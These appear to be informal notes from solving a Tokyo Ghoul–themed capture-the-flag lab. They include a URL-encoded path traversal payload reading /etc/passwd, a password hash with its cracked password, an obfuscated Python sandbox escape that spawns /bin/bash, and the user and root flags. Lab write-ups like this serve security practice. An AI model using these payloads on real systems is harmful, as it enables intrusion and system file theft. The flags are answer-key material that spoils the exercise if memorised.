!-- look don't tell jason but we will help you escape we will give you the key to open those chains and here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there --
-----------------
jasonroom.html
---------
 here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there you will find a freind who will help you

-----------------
kamishiro
Hey Kaneki finnaly you want to talk 
Unfortunately before I can give you the kagune you need to give me the paraphrase
Do you have what I'm looking for?
Good job. I believe this is what you came for:
Hmm. I don't think this is what I was looking for.
Take a look inside of me. rabin2 -z
------------------------------------------
key == kamishiro 
You_found_1t == extract passpharase

d1r3c70ry_center

http://10.201.71.213/d1r3c70ry_center/claim/
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd == payload

kamishiro =user 

kamishiro:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:1001:1001:,,,:/home/kamishiro:/bin/bash 

password123

userflag == e6215e25c0783eb4279693d9f073594a

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')


rootflag == 9d790bb87898ca66f724ab05a9e6000b
